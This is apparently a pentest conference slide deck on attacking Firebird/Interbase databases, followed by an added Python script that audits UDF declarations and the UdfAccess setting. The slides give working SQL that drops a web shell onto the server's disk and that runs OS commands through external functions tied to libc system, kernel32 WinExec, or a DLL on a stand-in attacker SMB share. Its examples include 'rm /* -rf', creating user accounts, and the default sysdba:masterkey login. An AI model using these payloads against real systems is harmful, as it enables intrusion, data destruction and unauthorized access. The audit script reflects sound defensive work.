Firebird Interbase Database engine hacks or rtfm

Notes on database security assessment


  1. Firebird/Interbase database engine hacks or RTFM
     Osipov Alexey, @GiftsUngiven
  2. /whoami
     • Osipov Alexey
     • Web hacker, pentester, member of SCADAStrangeLove
     • PHDays, BlackHat, NoSuchCon speaker
     • Developer of various pentesting PoCs
       – XML
       – MySQL
     • Twitter: @GiftsUngiven
  3. Why so serious?
     • "Pseudo" market shares
       – MySQL, MSSQL, Oracle, PostgreSQL, …: 99%
       – Firebird: 1%
     • That means
       – MySQL, MSSQL, Oracle, PostgreSQL, …: N ways to own them
       – Firebird: no ways to own it
  4. Pentesting
     • Requirements
       – SQLi
         – https://forum.antichat.ru/
         – https://rdot.org
       – Account, which is sysdba:masterkey most of the time
     • No ways to escape it
       – RW filesystem
       – Execute
     • So..
  5. File creation (part 1)
     • Create a difference file (the nbackup delta file: once the database is put into backup state, page changes are written to that file instead of the database, so the payload lands in a path of your choosing; the table `exploited` must already exist in the database you connect to)
       – CONNECT '<host>:<existent database>';
       – ALTER DATABASE ADD DIFFERENCE FILE '<filename>';
       – ALTER DATABASE BEGIN BACKUP;
       – INSERT INTO exploited VALUES ('<ASP/JSP/PHP shell>');
       – COMMIT;
     • Your file is locked, so
       – EXIT;
  6. File creation (part 2)
     • Database creation (the database file itself is written wherever the path points, e.g. under a web root; `value` is a reserved word in Firebird, so it is double-quoted as an identifier)
       – CREATE DATABASE '<host>:<arbitrary non-existent path>';
       – CREATE TABLE a ("value" BLOB);
       – INSERT INTO a VALUES ('<ASP/JSP/PHP shell>');
       – COMMIT;
     • Again, your file is locked
       – EXIT;
  7. RCE (part 1)
     • Main problem is configuration (but sometimes it is enabled): loading of external function modules is governed by UdfAccess in firebird.conf, and a module outside the UDF directory, such as libc here, only loads with UdfAccess = Full
     • *nix (like in PostgreSQL)
       – DECLARE EXTERNAL FUNCTION exec cstring(4096) RETURNS cstring(4096) ENTRY_POINT 'system' MODULE_NAME '/lib/libc.so';
       – SELECT FIRST 1 exec('rm /* -rf') FROM any_table;
     • FIRST 1 is Firebird's row limiter (there is no LIMIT clause). system() returns an int, so RETURNS integer BY VALUE, as used for WinExec on the next slide, matches its C signature; the command runs either way
  8. RCE (part 2)
     • Windows (the second argument is WinExec's uCmdShow; 1 is SW_SHOWNORMAL)
       – DECLARE EXTERNAL FUNCTION exec cstring(4096), integer RETURNS integer BY VALUE ENTRY_POINT 'WinExec' MODULE_NAME 'c:\windows\system32\kernel32.dll';
       – SELECT FIRST 1 exec('net user /add ****', 1) FROM any_table;
     • Kudos to Alexander Tlyapov (@Rigros1)
  9. RCE (part 3)
     • Windows (the module is loaded straight from an SMB share you control)
       – DECLARE EXTERNAL FUNCTION exec cstring(4096) RETURNS cstring(4096) ENTRY_POINT 'Exec' MODULE_NAME '\\evilhost\share\udf.dll';
       – SELECT FIRST 1 exec('net user /add ****') FROM any_table;
     • No NTLM auth from the host, so Samba with anonymous login only
     • Can create any needed function (the DLL is yours, so the entry point does whatever you like)
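The three RCE slides share one detection surface: a DECLARE EXTERNAL FUNCTION whose module is libc, kernel32 or a UNC share, on a server whose firebird.conf lets such modules load. The audit helper below is an added example, not code from the slides or from the Firebird project. It works on rows shaped like the RDB$FUNCTIONS system table (RDB$FUNCTION_NAME, RDB$MODULE_NAME, RDB$ENTRYPOINT) and on the text of firebird.conf; the sample rows and config excerpt are constructed to mirror the declarations above, and the "Restrict UDF" default assumed when the UdfAccess line is commented out is the one shipped with the 2.x/3.0 series.

```python
"""Audit Firebird external-function (UDF) declarations for the RCE pattern above.

Added example, not code from the slides or from the Firebird project. Runs offline on
the constructed sample data at the bottom; on a live server, run CATALOG_QUERY and feed
the resulting rows to audit_functions().
"""
import re

# Query to pull the declarations from a live database (isql or any Firebird driver).
CATALOG_QUERY = """
SELECT RDB$FUNCTION_NAME, RDB$MODULE_NAME, RDB$ENTRYPOINT
FROM RDB$FUNCTIONS
WHERE RDB$MODULE_NAME IS NOT NULL
"""

# Entry points that run OS commands rather than extend SQL (constructed list; extend it).
SHELL_ENTRYPOINTS = {
    "system", "popen", "execve", "execl", "execvp",      # libc
    "winexec", "shellexecutea", "shellexecutew",         # Windows
    "createprocessa", "createprocessw",
}


def is_unc_path(module: str) -> bool:
    """UNC path (//host/share/x.dll or its backslash form): loaded straight off the network."""
    return module.strip().startswith(("\\\\", "//"))


def is_external_path(module: str) -> bool:
    """True when MODULE_NAME names a location rather than a bare library name.
    A bare name (e.g. 'fbudf') is resolved inside the directories UdfAccess allows;
    an absolute, drive-letter or UNC path escapes that restriction."""
    m = module.strip()
    return m.startswith("/") or is_unc_path(m) or re.match(r"^[A-Za-z]:[\\/]", m) is not None


def audit_functions(rows):
    """Return {function_name: [reasons]} for every declaration worth a second look."""
    findings = {}
    for name, module, entry in rows:
        reasons = []
        if entry.strip().lower() in SHELL_ENTRYPOINTS:
            reasons.append(f"entry point {entry.strip()!r} runs OS commands")
        if is_external_path(module):
            where = "UNC share" if is_unc_path(module) else "absolute path"
            reasons.append(f"module {module.strip()!r} loaded from {where}, outside the UDF directory")
        if reasons:
            findings[name.strip()] = reasons
    return findings


def udf_access(conf_text: str) -> str:
    """Effective UdfAccess from firebird.conf text. A commented-out line means the
    built-in default, taken here as 'Restrict UDF' (the 2.x/3.0 default; an assumption
    for other releases). The last uncommented assignment wins."""
    value = "Restrict UDF"
    for line in conf_text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = re.match(r"^UdfAccess\s*=\s*(.+)$", line, re.IGNORECASE)
        if m:
            value = m.group(1).strip()
    return value


def server_allows_foreign_modules(conf_text: str) -> bool:
    """Only UdfAccess = Full lets MODULE_NAME point at libc, kernel32 or a share."""
    return udf_access(conf_text).lower() == "full"


# Constructed sample data mirroring the three RCE slides plus one legitimate UDF.
SAMPLE_ROWS = [
    ("EXEC", "/lib/libc.so", "system"),
    ("EXEC2", "c:\\windows\\system32\\kernel32.dll", "WinExec"),
    ("EXEC3", "\\\\evilhost\\share\\udf.dll", "Exec"),
    ("ADDDAY", "fbudf", "addDay"),   # ships with Firebird, resolved inside the UDF dir
]
SAMPLE_CONF = "# firebird.conf excerpt (constructed)\n#UdfAccess = Restrict UDF\nUdfAccess = Full\n"

if __name__ == "__main__":
    print("UdfAccess =", udf_access(SAMPLE_CONF))
    for fn, reasons in audit_functions(SAMPLE_ROWS).items():
        for r in reasons:
            print(f"{fn}: {r}")
```

On the sample data the three slide declarations are flagged (two reasons each for the libc and kernel32 variants, one for the UNC share) while the bundled fbudf function is not, and the config excerpt reports Full, which is the setting that made the slides' MODULE_NAME values loadable in the first place. Dropping the offending declarations (DROP EXTERNAL FUNCTION) and setting UdfAccess back to Restrict or None closes this path without touching the SQLi or the sysdba:masterkey account, which remain the root problems.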
  10. Questions?
      @GiftsUngiven
